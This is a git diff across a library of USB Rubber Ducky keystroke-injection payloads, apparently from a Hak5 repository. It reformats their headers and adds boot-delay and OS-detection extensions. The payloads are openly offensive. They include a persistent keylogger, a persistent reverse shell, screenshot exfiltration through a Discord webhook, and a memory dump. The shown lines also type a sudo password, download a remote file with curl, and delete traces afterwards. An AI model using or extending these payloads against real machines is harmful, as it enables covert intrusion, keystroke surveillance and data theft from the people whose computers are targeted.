+ DEFINE #MAX_WAIT 150
+ DEFINE #CHECK_INTERVAL 20
+ DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
+ DEFINE #NOT_WINDOWS 7
+
+ $_OS = #NOT_WINDOWS
+
+ VAR $MAX_TRIES = #MAX_WAIT
+ WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
+ DELAY #CHECK_INTERVAL
+ $MAX_TRIES = ($MAX_TRIES - 1)
+ END_WHILE
+ IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
+ $_OS = WINDOWS
+ END_IF
+
+ REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
+ IF ($_OS == WINDOWS) THEN
+ STRING HELLO WINDOWS!
+ ELSE
+ STRING HELLO WORLD!
+ END_IF
+ END_REM
+END_EXTENSION
GUI r
DELAY 2000
diff --git a/payloads/library/execution/Persistent_Keylogger-Telegram_Based/payload.txt b/payloads/library/execution/Persistent_Keylogger-Telegram_Based/payload.txt
index 50149ba..8c6bccd 100644
--- a/payloads/library/execution/Persistent_Keylogger-Telegram_Based/payload.txt
+++ b/payloads/library/execution/Persistent_Keylogger-Telegram_Based/payload.txt
@@ -1,12 +1,14 @@
-REM ########################################################
-REM # #
-REM # Title : Persistent Keylogger - Telegram Based #
-REM # Author : Aleff #
-REM # Version : 1.0 #
-REM # Category : Execution #
-REM # Target : Linux #
-REM # #
-REM ########################################################
+REM_BLOCK
+########################################################
+# #
+# Title : Persistent Keylogger - Telegram Based #
+# Author : Aleff #
+# Version : 1.0 #
+# Category : Execution #
+# Target : Linux #
+# #
+########################################################
+END_REM
REM Requirements:
REM - Internet Connection
@@ -14,7 +16,33 @@ REM - Internet Connection
REM Here you must put your own file link
DEFINE #PYTHON-SCRIPT-LINK https://www.example.com/connection.py
-DELAY 1000
+EXTENSION DETECT_READY
+ REM VERSION 1.1
+ REM AUTHOR: Korben
+
+ REM_BLOCK DOCUMENTATION
+ USAGE:
+ Extension runs inline (here)
+ Place at beginning of payload (besides ATTACKMODE) to act as dynamic
+ boot delay
+
+ TARGETS:
+ Any system that reflects CAPSLOCK will detect minimum required delay
+ Any system that does not reflect CAPSLOCK will hit the max delay of 3000ms
+ END_REM
+
+ REM CONFIGURATION:
+ DEFINE #RESPONSE_DELAY 25
+ DEFINE #ITERATION_LIMIT 120
+
+ VAR $C = 0
+ WHILE (($_CAPSLOCK_ON == FALSE) && ($C < #ITERATION_LIMIT))
+ CAPSLOCK
+ DELAY #RESPONSE_DELAY
+ $C = ($C + 1)
+ END_WHILE
+ CAPSLOCK
+END_EXTENSION
CTRL-ALT t
DELAY 2000
diff --git a/payloads/library/execution/Persistent_Reverse_Shell-Telegram_Based/payload.txt b/payloads/library/execution/Persistent_Reverse_Shell-Telegram_Based/payload.txt
index 1ce3096..36ef494 100644
--- a/payloads/library/execution/Persistent_Reverse_Shell-Telegram_Based/payload.txt
+++ b/payloads/library/execution/Persistent_Reverse_Shell-Telegram_Based/payload.txt
@@ -1,12 +1,14 @@
-REM ############################################################
-REM # #
-REM # Title : Persistent Reverse Shell - Telegram Based #
-REM # Author : Aleff #
-REM # Version : 1.0 #
-REM # Category : Execution #
-REM # Target : Linux #
-REM # #
-REM ############################################################
+REM_BLOCK
+############################################################
+# #
+# Title : Persistent Reverse Shell - Telegram Based #
+# Author : Aleff #
+# Version : 1.0 #
+# Category : Execution #
+# Target : Linux #
+# #
+############################################################
+END_REM
REM Requirements:
REM - Internet Connection
@@ -14,7 +16,33 @@ REM - Internet Connection
REM Here you must put your own file link
DEFINE #PYTHON-SCRIPT-LINK https://www.example.com/connection.py
-DELAY 1000
+EXTENSION DETECT_READY
+ REM VERSION 1.1
+ REM AUTHOR: Korben
+
+ REM_BLOCK DOCUMENTATION
+ USAGE:
+ Extension runs inline (here)
+ Place at beginning of payload (besides ATTACKMODE) to act as dynamic
+ boot delay
+
+ TARGETS:
+ Any system that reflects CAPSLOCK will detect minimum required delay
+ Any system that does not reflect CAPSLOCK will hit the max delay of 3000ms
+ END_REM
+
+ REM CONFIGURATION:
+ DEFINE #RESPONSE_DELAY 25
+ DEFINE #ITERATION_LIMIT 120
+
+ VAR $C = 0
+ WHILE (($_CAPSLOCK_ON == FALSE) && ($C < #ITERATION_LIMIT))
+ CAPSLOCK
+ DELAY #RESPONSE_DELAY
+ $C = ($C + 1)
+ END_WHILE
+ CAPSLOCK
+END_EXTENSION
CTRL-ALT t
DELAY 2000
diff --git a/payloads/library/execution/SendEmailThroughThunderbird/payload.txt b/payloads/library/execution/SendEmailThroughThunderbird/payload.txt
index c2dd218..457de69 100644
--- a/payloads/library/execution/SendEmailThroughThunderbird/payload.txt
+++ b/payloads/library/execution/SendEmailThroughThunderbird/payload.txt
@@ -1,13 +1,14 @@
-REM ########################################################
-REM # |
-REM # Title : Send Email Through Thunderbird |
-REM # Author : Aleff |
-REM # Version : 1.0 |
-REM # Category : Execution |
-REM # Target : Windows 10/11 - Linux(debian tested) |
-REM # |
-REM ########################################################
-
+REM_BLOCK
+########################################################
+# #
+# Title : Send Email Through Thunderbird #
+# Author : Aleff #
+# Version : 1.0 #
+# Category : Execution #
+# Target : Windows 10/11 - Linux(debian tested) #
+# #
+########################################################
+END_REM
REM Requirements:
REM - Internet Connection
diff --git a/payloads/library/execution/Send_Messages_In_Discord_Channel-Server/payload.txt b/payloads/library/execution/Send_Messages_In_Discord_Channel-Server/payload.txt
index 0e82f52..831f1d0 100644
--- a/payloads/library/execution/Send_Messages_In_Discord_Channel-Server/payload.txt
+++ b/payloads/library/execution/Send_Messages_In_Discord_Channel-Server/payload.txt
@@ -1,22 +1,64 @@
-REM ############################################################
-REM # |
-REM # Title : Send Messages In Discord Channel-Server |
-REM # Author : Aleff |
-REM # Version : 1.0 |
-REM # Category : Execution |
-REM # Target : Windows 10-11 |
-REM # |
-REM ############################################################
-
+REM_BLOCK
+############################################################
+# #
+# Title : Send Messages In Discord Channel-Server #
+# Author : Aleff #
+# Version : 1.0 #
+# Category : Execution #
+# Target : Windows 10-11 #
+# #
+############################################################
+END_REM
REM Requirements:
REM - Internet connection
REM - Discord Installed
-
REM If, for example, the server is Hak5 and the channel in which you want to send the message is called usb-rubber-ducky then you should write just usb-rubber-ducky
DEFINE #CHAT_NAME example
+EXTENSION PASSIVE_WINDOWS_DETECT
+ REM VERSION 1.1
+ REM AUTHOR: Korben
+
+ REM_BLOCK DOCUMENTATION
+ Windows fully passive OS Detection and passive Detect Ready
+ Includes its own passive detect ready.
+ Does not require additional extensions.
+
+ USAGE:
+ Extension runs inline (here)
+ Place at beginning of payload (besides ATTACKMODE) to act as dynamic
+ boot delay
+ $_OS will be set to WINDOWS or NOT_WINDOWS
+ See end of payload for usage within payload
+ END_REM
+
+ REM CONFIGURATION:
+ DEFINE #MAX_WAIT 150
+ DEFINE #CHECK_INTERVAL 20
+ DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
+ DEFINE #NOT_WINDOWS 7
+
+ $_OS = #NOT_WINDOWS
+
+ VAR $MAX_TRIES = #MAX_WAIT
+ WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
+ DELAY #CHECK_INTERVAL
+ $MAX_TRIES = ($MAX_TRIES - 1)
+ END_WHILE
+ IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
+ $_OS = WINDOWS
+ END_IF
+
+ REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
+ IF ($_OS == WINDOWS) THEN
+ STRING HELLO WINDOWS!
+ ELSE
+ STRING HELLO WORLD!
+ END_IF
+ END_REM
+END_EXTENSION
REM Open Discord app
GUI
diff --git a/payloads/library/execution/SetArbitraryVPN_Linux/payload.txt b/payloads/library/execution/SetArbitraryVPN_Linux/payload.txt
index 1cd8718..f29cf08 100644
--- a/payloads/library/execution/SetArbitraryVPN_Linux/payload.txt
+++ b/payloads/library/execution/SetArbitraryVPN_Linux/payload.txt
@@ -1,13 +1,14 @@
-
-REM ####################################
-REM # |
-REM # Title : Set Arbitrary VPN |
-REM # Author : Aleff |
-REM # Version : 1.0 |
-REM # Category : Execution |
-REM # Target : Linux |
-REM # |
-REM ####################################
+REM_BLOCK
+####################################
+# #
+# Title : Set Arbitrary VPN #
+# Author : Aleff #
+# Version : 1.0 #
+# Category : Execution #
+# Target : Linux #
+# #
+####################################
+END_REM
REM Requirements:
REM - Permissions
@@ -15,44 +16,57 @@ REM - Internet Connection
REM - 'openvpn' installed
REM REQUIRED: You need to know the sudo password and replace 'example' with this
-DEFINE SUDO_PASS example
+DEFINE #SUDO_PASS example
REM REQUIRED: Set your VPN file configuration replacing example.com with your own link
-DEFINE VPN_FILE_LINK example.com
+DEFINE #VPN_FILE_LINK example.com
+
+EXTENSION DETECT_READY
+ REM VERSION 1.1
+ REM AUTHOR: Korben
+
+ REM_BLOCK DOCUMENTATION
+ USAGE:
+ Extension runs inline (here)
+ Place at beginning of payload (besides ATTACKMODE) to act as dynamic
+ boot delay
+
+ TARGETS:
+ Any system that reflects CAPSLOCK will detect minimum required delay
+ Any system that does not reflect CAPSLOCK will hit the max delay of 3000ms
+ END_REM
+
+ REM CONFIGURATION:
+ DEFINE #RESPONSE_DELAY 25
+ DEFINE #ITERATION_LIMIT 120
+
+ VAR $C = 0
+ WHILE (($_CAPSLOCK_ON == FALSE) && ($C < #ITERATION_LIMIT))
+ CAPSLOCK
+ DELAY #RESPONSE_DELAY
+ $C = ($C + 1)
+ END_WHILE
+ CAPSLOCK
+END_EXTENSION
-DELAY 1000
CTRL-ALT t
DELAY 2000
-
REM #### PERMISSIONS SECTION ####
-
-
-STRING sudo su
-ENTER
+STRINGLN sudo su
DELAY 1000
-STRING SUDO_PASS
-ENTER
+STRINGLN #SUDO_PASS
DELAY 1000
-
REM #### VPN SECTION ####
-
-
-STRING curl
-STRING VPN_FILE_LINK
-STRING > vpn_configuration.ovpn
-ENTER
+STRINGLN curl #VPN_FILE_LINK > vpn_configuration.ovpn
REM It depends by the internet connection
DELAY 2000
-STRING openvpn vpn_configuration.ovpn
+STRINGLN openvpn vpn_configuration.ovpn
REM It depends by the computer power
DELAY 2000
-
REM #### REMOVE TRACES ####
-
-
STRING rm vpn_configuration.ovpn
ENTER
DELAY 500
diff --git a/payloads/library/execution/Set_An_Arbitrary_And_Persistent_Tor_Circuit/payload.txt b/payloads/library/execution/Set_An_Arbitrary_And_Persistent_Tor_Circuit/payload.txt
index 1c690de..3ac3507 100644
--- a/payloads/library/execution/Set_An_Arbitrary_And_Persistent_Tor_Circuit/payload.txt
+++ b/payloads/library/execution/Set_An_Arbitrary_And_Persistent_Tor_Circuit/payload.txt
@@ -1,12 +1,12 @@
REM_BLOCK
################################################################
-# |
-# Title : Set An Arbitrary And Persistent Tor Circuit |
-# Author : Aleff |
-# Version : 1.0 |
-# Category : Execution |
-# Target : Windows 10/11; Linux; |
-# |
+# #
+# Title : Set An Arbitrary And Persistent Tor Circuit #
+# Author : Aleff #
+# Version : 1.0 #
+# Category : Execution #
+# Target : Windows 10/11; Linux; #
+# #
################################################################
Requirements:
diff --git a/payloads/library/execution/Set_An_Arbitrary_DNS-IPv4_version/payload.txt b/payloads/library/execution/Set_An_Arbitrary_DNS-IPv4_version/payload.txt
index 2c29325..db55616 100644
--- a/payloads/library/execution/Set_An_Arbitrary_DNS-IPv4_version/payload.txt
+++ b/payloads/library/execution/Set_An_Arbitrary_DNS-IPv4_version/payload.txt
@@ -1,24 +1,65 @@
-REM ########################################################
-REM # |
-REM # Title : Set An Arbitrary DNS (IPv4 version) |
-REM # Author : Aleff |
-REM # Version : 1.0 |
-REM # Category : Execution |
-REM # Target : Windows 11 |
-REM # |
-REM ########################################################
-
+REM_BLOCK
+########################################################
+# #
+# Title : Set An Arbitrary DNS (IPv4 version) #
+# Author : Aleff #
+# Version : 1.0 #
+# Category : Execution #
+# Target : Windows 11 #
+# #
+########################################################
+END_REM
REM Requirements:
REM - Nothing
-
REM DNS IPv4 like Cloudflare DNS 1.1.1.1
DEFINE DNS example
+EXTENSION PASSIVE_WINDOWS_DETECT
+ REM VERSION 1.1
+ REM AUTHOR: Korben
+
+ REM_BLOCK DOCUMENTATION
+ Windows fully passive OS Detection and passive Detect Ready
+ Includes its own passive detect ready.
+ Does not require additional extensions.
+
+ USAGE:
+ Extension runs inline (here)
+ Place at beginning of payload (besides ATTACKMODE) to act as dynamic
+ boot delay
+ $_OS will be set to WINDOWS or NOT_WINDOWS
+ See end of payload for usage within payload
+ END_REM
+
+ REM CONFIGURATION:
+ DEFINE #MAX_WAIT 150
+ DEFINE #CHECK_INTERVAL 20
+ DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
+ DEFINE #NOT_WINDOWS 7
+
+ $_OS = #NOT_WINDOWS
+
+ VAR $MAX_TRIES = #MAX_WAIT
+ WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
+ DELAY #CHECK_INTERVAL
+ $MAX_TRIES = ($MAX_TRIES - 1)
+ END_WHILE
+ IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
+ $_OS = WINDOWS
+ END_IF
+
+ REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
+ IF ($_OS == WINDOWS) THEN
+ STRING HELLO WINDOWS!
+ ELSE
+ STRING HELLO WORLD!
+ END_IF
+ END_REM
+END_EXTENSION
REM Open Settings
-DELAY 1000
GUI
DELAY 1000
STRING settings
diff --git a/payloads/library/execution/Set_Tor_Bridge_In_Windows/payload.txt b/payloads/library/execution/Set_Tor_Bridge_In_Windows/payload.txt
index fca7921..5718b92 100644
--- a/payloads/library/execution/Set_Tor_Bridge_In_Windows/payload.txt
+++ b/payloads/library/execution/Set_Tor_Bridge_In_Windows/payload.txt
@@ -1,12 +1,14 @@
-REM ###################################
-REM # |
-REM # Title : Set Tor Bridge |
-REM # Author : Aleff |
-REM # Version : 1.0 |
-REM # Category : Execution |
-REM # Target : Windows 10/11 |
-REM # |
-REM ###################################
+REM_BLOCK
+###################################
+# #
+# Title : Set Tor Bridge #
+# Author : Aleff #
+# Version : 1.0 #
+# Category : Execution #
+# Target : Windows 10/11 #
+# #
+###################################
+END_REM
REM Requirements:
REM - Tor installed
diff --git a/payloads/library/execution/Starting_a_PowerShell_with_administrator_permissions_in_Windows/payload.txt b/payloads/library/execution/Starting_a_PowerShell_with_administrator_permissions_in_Windows/payload.txt
index 9935c89..bba8865 100644
--- a/payloads/library/execution/Starting_a_PowerShell_with_administrator_permissions_in_Windows/payload.txt
+++ b/payloads/library/execution/Starting_a_PowerShell_with_administrator_permissions_in_Windows/payload.txt
@@ -1,17 +1,61 @@
-REM ####################################################################################
-REM # |
-REM # Title : Starting a PowerShell with administrator permissions in Windows |
-REM # Author : Aleff |
-REM # Version : 1.0 |
-REM # Category : Execution |
-REM # Target : Windows 10-11 |
-REM # |
-REM ####################################################################################
+REM_BLOCK
+####################################################################################
+# #
+# Title : Starting a PowerShell with administrator permissions in Windows #
+# Author : Aleff #
+# Version : 1.0 #
+# Category : Execution #
+# Target : Windows 10-11 #
+# #
+####################################################################################
+END_REM
REM Requirements:
REM - Nothing
-DELAY 1000
+EXTENSION PASSIVE_WINDOWS_DETECT
+ REM VERSION 1.1
+ REM AUTHOR: Korben
+
+ REM_BLOCK DOCUMENTATION
+ Windows fully passive OS Detection and passive Detect Ready
+ Includes its own passive detect ready.
+ Does not require additional extensions.
+
+ USAGE:
+ Extension runs inline (here)
+ Place at beginning of payload (besides ATTACKMODE) to act as dynamic
+ boot delay
+ $_OS will be set to WINDOWS or NOT_WINDOWS
+ See end of payload for usage within payload
+ END_REM
+
+ REM CONFIGURATION:
+ DEFINE #MAX_WAIT 150
+ DEFINE #CHECK_INTERVAL 20
+ DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
+ DEFINE #NOT_WINDOWS 7
+
+ $_OS = #NOT_WINDOWS
+
+ VAR $MAX_TRIES = #MAX_WAIT
+ WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
+ DELAY #CHECK_INTERVAL
+ $MAX_TRIES = ($MAX_TRIES - 1)
+ END_WHILE
+ IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
+ $_OS = WINDOWS
+ END_IF
+
+ REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
+ IF ($_OS == WINDOWS) THEN
+ STRING HELLO WINDOWS!
+ ELSE
+ STRING HELLO WORLD!
+ END_IF
+ END_REM
+END_EXTENSION
+
GUI x
DELAY 500
STRING a
diff --git a/payloads/library/execution/Stop_A_Single_Process_In_Windows/payload.txt b/payloads/library/execution/Stop_A_Single_Process_In_Windows/payload.txt
index dbdc29d..178f3b1 100644
--- a/payloads/library/execution/Stop_A_Single_Process_In_Windows/payload.txt
+++ b/payloads/library/execution/Stop_A_Single_Process_In_Windows/payload.txt
@@ -1,28 +1,68 @@
-
-REM #####################################################
-REM # |
-REM # Title : Stop A Single Process In Windows |
-REM # Author : Aleff |
-REM # Version : 1.0 |
-REM # Category : Execution |
-REM # Target : Windows 10/11 |
-REM # |
-REM #####################################################
-
+REM_BLOCK
+#####################################################
+# #
+# Title : Stop A Single Process In Windows #
+# Author : Aleff #
+# Version : 1.0 #
+# Category : Execution #
+# Target : Windows 10/11 #
+# #
+#####################################################
+END_REM
REM Requirements:
REM - Nothing
-
REM Write the name of the process that you want to stop
DEFINE PROCESS_NAME example
+EXTENSION PASSIVE_WINDOWS_DETECT
+ REM VERSION 1.1
+ REM AUTHOR: Korben
+
+ REM_BLOCK DOCUMENTATION
+ Windows fully passive OS Detection and passive Detect Ready
+ Includes its own passive detect ready.
+ Does not require additional extensions.
+
+ USAGE:
+ Extension runs inline (here)
+ Place at beginning of payload (besides ATTACKMODE) to act as dynamic
+ boot delay
+ $_OS will be set to WINDOWS or NOT_WINDOWS
+ See end of payload for usage within payload
+ END_REM
+
+ REM CONFIGURATION:
+ DEFINE #MAX_WAIT 150
+ DEFINE #CHECK_INTERVAL 20
+ DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
+ DEFINE #NOT_WINDOWS 7
+
+ $_OS = #NOT_WINDOWS
+
+ VAR $MAX_TRIES = #MAX_WAIT
+ WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
+ DELAY #CHECK_INTERVAL
+ $MAX_TRIES = ($MAX_TRIES - 1)
+ END_WHILE
+ IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
+ $_OS = WINDOWS
+ END_IF
+
+ REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
+ IF ($_OS == WINDOWS) THEN
+ STRING HELLO WINDOWS!
+ ELSE
+ STRING HELLO WORLD!
+ END_IF
+ END_REM
+END_EXTENSION
REM Open Task Manager
GUI
DELAY 1000
-STRING Task Manager
-ENTER
+STRINGLN Task Manager
DELAY 1000
REM Goto search bar
@@ -36,9 +76,7 @@ TAB
DELAY 500
REM Write the process name
-STRING PROCESS_NAME
-DELAY 500
-ENTER
+STRINGLN PROCESS_NAME
DELAY 500
TAB
DELAY 500
diff --git a/payloads/library/execution/Telegram_Persistent_Connection_Linux/payload.txt b/payloads/library/execution/Telegram_Persistent_Connection_Linux/payload.txt
index 0d4958d..b3738e8 100644
--- a/payloads/library/execution/Telegram_Persistent_Connection_Linux/payload.txt
+++ b/payloads/library/execution/Telegram_Persistent_Connection_Linux/payload.txt
@@ -1,12 +1,14 @@
-REM #######################################################
-REM # |
-REM # Title : Telegram Persistent Connection Linux |
-REM # Author : Aleff |
-REM # Version : 1.0 |
-REM # Category : Execution |
-REM # Target : Linux |
-REM # |
-REM #######################################################
+REM_BLOCK
+#######################################################
+# #
+# Title : Telegram Persistent Connection Linux #
+# Author : Aleff #
+# Version : 1.0 #
+# Category : Execution #
+# Target : Linux #
+# #
+#######################################################
+END_REM
REM Requirements:
REM - Internet Connection
@@ -14,7 +16,34 @@ REM - Internet Connection
REM Here you must put your own file link
DEFINE #PYTHON-SCRIPT-LINK https://www.example.com/connection.py
-DELAY 1000
+EXTENSION DETECT_READY
+ REM VERSION 1.1
+ REM AUTHOR: Korben
+
+ REM_BLOCK DOCUMENTATION
+ USAGE:
+ Extension runs inline (here)
+ Place at beginning of payload (besides ATTACKMODE) to act as dynamic
+ boot delay
+
+ TARGETS:
+ Any system that reflects CAPSLOCK will detect minimum required delay
+ Any system that does not reflect CAPSLOCK will hit the max delay of 3000ms
+ END_REM
+
+ REM CONFIGURATION:
+ DEFINE #RESPONSE_DELAY 25
+ DEFINE #ITERATION_LIMIT 120
+
+ VAR $C = 0
+ WHILE (($_CAPSLOCK_ON == FALSE) && ($C < #ITERATION_LIMIT))
+ CAPSLOCK
+ DELAY #RESPONSE_DELAY
+ $C = ($C + 1)
+ END_WHILE
+ CAPSLOCK
+END_EXTENSION
+
CTRL-ALT t
DELAY 2000
diff --git a/payloads/library/execution/UninstallSignal/payload.txt b/payloads/library/execution/UninstallSignal/payload.txt
index 9006fba..9beced9 100644
--- a/payloads/library/execution/UninstallSignal/payload.txt
+++ b/payloads/library/execution/UninstallSignal/payload.txt
@@ -1,12 +1,14 @@
-REM #####################################
-REM # |
-REM # Title : Uninstall Signal |
-REM # Author : Aleff |
-REM # Version : 1.0 |
-REM # Category : Execution |
-REM # Target : Windows 10-11 |
-REM # |
-REM #####################################
+REM_BLOCK
+#####################################
+# #
+# Title : Uninstall Signal #
+# Author : Aleff #
+# Version : 1.0 #
+# Category : Execution #
+# Target : Windows 10-11 #
+# #
+#####################################
+END_REM
REM Plug-And-Play <3
@@ -14,11 +16,52 @@ REM Requirements:
REM - Signal App installed
REM - ExecutionPolicy Bypass
-DELAY 2000
+EXTENSION PASSIVE_WINDOWS_DETECT
+ REM VERSION 1.1
+ REM AUTHOR: Korben
+
+ REM_BLOCK DOCUMENTATION
+ Windows fully passive OS Detection and passive Detect Ready
+ Includes its own passive detect ready.
+ Does not require additional extensions.
+
+ USAGE:
+ Extension runs inline (here)
+ Place at beginning of payload (besides ATTACKMODE) to act as dynamic
+ boot delay
+ $_OS will be set to WINDOWS or NOT_WINDOWS
+ See end of payload for usage within payload
+ END_REM
+
+ REM CONFIGURATION:
+ DEFINE #MAX_WAIT 150
+ DEFINE #CHECK_INTERVAL 20
+ DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
+ DEFINE #NOT_WINDOWS 7
+
+ $_OS = #NOT_WINDOWS
+
+ VAR $MAX_TRIES = #MAX_WAIT
+ WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
+ DELAY #CHECK_INTERVAL
+ $MAX_TRIES = ($MAX_TRIES - 1)
+ END_WHILE
+ IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
+ $_OS = WINDOWS
+ END_IF
+
+ REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
+ IF ($_OS == WINDOWS) THEN
+ STRING HELLO WINDOWS!
+ ELSE
+ STRING HELLO WORLD!
+ END_IF
+ END_REM
+END_EXTENSION
+
GUI r
DELAY 1000
-STRING powershell
-ENTER
+STRINGLN powershell
DELAY 2000
STRINGLN Stop-Process -Name "Signal"
diff --git a/payloads/library/execution/Uninstall_A_Specific_App_On_Windows_Through_Control_Panel/README.md b/payloads/library/execution/Uninstall_A_Specific_App_On_Windows_Through_Control_Panel/README.md
index 826bc0c..60bb2ac 100644
--- a/payloads/library/execution/Uninstall_A_Specific_App_On_Windows_Through_Control_Panel/README.md
+++ b/payloads/library/execution/Uninstall_A_Specific_App_On_Windows_Through_Control_Panel/README.md
@@ -36,17 +36,11 @@ In addition to legal implications, **unauthorized removal of an application can
Github
-
-
-
-
-
Instagram
- |
-
Discord
+
Linkedin
|
diff --git a/payloads/library/execution/Uninstall_A_Specific_App_On_Windows_Through_Control_Panel/payload.txt b/payloads/library/execution/Uninstall_A_Specific_App_On_Windows_Through_Control_Panel/payload.txt
index 67f6dbd..07366cf 100644
--- a/payloads/library/execution/Uninstall_A_Specific_App_On_Windows_Through_Control_Panel/payload.txt
+++ b/payloads/library/execution/Uninstall_A_Specific_App_On_Windows_Through_Control_Panel/payload.txt
@@ -1,12 +1,14 @@
-REM ##############################################################################
-REM # |
-REM # Title : Uninstall A Specific App On Windows Through Control Panel |
-REM # Author : Aleff |
-REM # Version : 1.0 |
-REM # Category : Execution |
-REM # Target : Windows 10/11 |
-REM # |
-REM ##############################################################################
+REM_BLOCK
+##############################################################################
+# #
+# Title : Uninstall A Specific App On Windows Through Control Panel #
+# Author : Aleff #
+# Version : 1.0 #
+# Category : Execution #
+# Target : Windows 10/11 #
+# #
+##############################################################################
+END_REM
REM Requirements:
REM - The application you want to uninstall must be installed on the target (?obvious right? ^^)
@@ -17,15 +19,55 @@ REM - Payload tested on Windows 11 Eng
REM Set the exact name of the application as it appears within the control panel. Do not assume that just because an application is known by a certain name then it will have exactly that name, e.g. `Firefox` shows up again as `Mozilla Firefox (x64 en)`
DEFINE #APP_NAME example
+EXTENSION PASSIVE_WINDOWS_DETECT
+ REM VERSION 1.1
+ REM AUTHOR: Korben
+
+ REM_BLOCK DOCUMENTATION
+ Windows fully passive OS Detection and passive Detect Ready
+ Includes its own passive detect ready.
+ Does not require additional extensions.
+
+ USAGE:
+ Extension runs inline (here)
+ Place at beginning of payload (besides ATTACKMODE) to act as dynamic
+ boot delay
+ $_OS will be set to WINDOWS or NOT_WINDOWS
+ See end of payload for usage within payload
+ END_REM
+
+ REM CONFIGURATION:
+ DEFINE #MAX_WAIT 150
+ DEFINE #CHECK_INTERVAL 20
+ DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
+ DEFINE #NOT_WINDOWS 7
+
+ $_OS = #NOT_WINDOWS
+
+ VAR $MAX_TRIES = #MAX_WAIT
+ WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
+ DELAY #CHECK_INTERVAL
+ $MAX_TRIES = ($MAX_TRIES - 1)
+ END_WHILE
+ IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
+ $_OS = WINDOWS
+ END_IF
+
+ REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
+ IF ($_OS == WINDOWS) THEN
+ STRING HELLO WINDOWS!
+ ELSE
+ STRING HELLO WORLD!
+ END_IF
+ END_REM
+END_EXTENSION
REM Open Windows research
-DELAY 2000
GUI
DELAY 1000
REM Search and opern explorer app
-STRING explorer
-ENTER
+STRINGLN explorer
DELAY 1000
REM Goto search bar and open "Uninstall or change a program" page
diff --git a/payloads/library/exfiltration/Dump_Windows_Memory_Through_ProcDump/payload.txt b/payloads/library/exfiltration/Dump_Windows_Memory_Through_ProcDump/payload.txt
index 63282c8..d7c5910 100644
--- a/payloads/library/exfiltration/Dump_Windows_Memory_Through_ProcDump/payload.txt
+++ b/payloads/library/exfiltration/Dump_Windows_Memory_Through_ProcDump/payload.txt
@@ -1,18 +1,18 @@
-REM ########################################################
-REM # #
-REM # Title : Dump Windows Memory Through ProcDump #
-REM # Author : Aleff #
-REM # Version : 1.0 #
-REM # Category : Exfiltration #
-REM # Target : Windows #
-REM # #
-REM ########################################################
-
+REM_BLOCK
+########################################################
+# #
+# Title : Dump Windows Memory Through ProcDump #
+# Author : Aleff #
+# Version : 1.0 #
+# Category : Exfiltration #
+# Target : Windows #
+# #
+########################################################
+END_REM
REM Requirements:
REM - Authorization to execute powershell commands
-
REM You must change it to 'procdump' if you want to use procdump.exe instead of procdump64a.exe
DEFINE #WHAT_EXE_DO_YOU_WANT_TO_USE procdump64a
diff --git a/payloads/library/exfiltration/Exfiltrate Computer Screenshots/payload.txt b/payloads/library/exfiltration/Exfiltrate Computer Screenshots/payload.txt
index 05ee6f0..6f6e6f6 100644
--- a/payloads/library/exfiltration/Exfiltrate Computer Screenshots/payload.txt
+++ b/payloads/library/exfiltration/Exfiltrate Computer Screenshots/payload.txt
@@ -1,13 +1,12 @@
-REM ###################################################
-REM # |
-REM # Title : Exfiltrate Computer Screenshots |
-REM # Author : Aleff |
-REM # Version : 1.0 |
-REM # Category : Exfiltrate |
-REM # Target : Windows 10-11 |
-REM # |
-REM ###################################################
-
+###################################################
+# #
+# Title : Exfiltrate Computer Screenshots #
+# Author : Aleff #
+# Version : 1.0 #
+# Category : Exfiltrate #
+# Target : Windows 10-11 #
+# #
+###################################################
REM Requirements:
REM - Internet Connection
@@ -15,12 +14,53 @@ REM - Discord Webhook (or whatever you want for the exfiltration)
REM - ExecutionPolicy Bypass
REM - Python
-
REM REQUIRED - Set your Python script link
DEFINE SCRIPT-PY-LINK example.com
-DELAY 1000
+EXTENSION PASSIVE_WINDOWS_DETECT
+ REM VERSION 1.1
+ REM AUTHOR: Korben
+
+ REM_BLOCK DOCUMENTATION
+ Windows fully passive OS Detection and passive Detect Ready
+ Includes its own passive detect ready.
+ Does not require additional extensions.
+
+ USAGE:
+ Extension runs inline (here)
+ Place at beginning of payload (besides ATTACKMODE) to act as dynamic
+ boot delay
+ $_OS will be set to WINDOWS or NOT_WINDOWS
+ See end of payload for usage within payload
+ END_REM
+
+ REM CONFIGURATION:
+ DEFINE #MAX_WAIT 150
+ DEFINE #CHECK_INTERVAL 20
+ DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
+ DEFINE #NOT_WINDOWS 7
+
+ $_OS = #NOT_WINDOWS
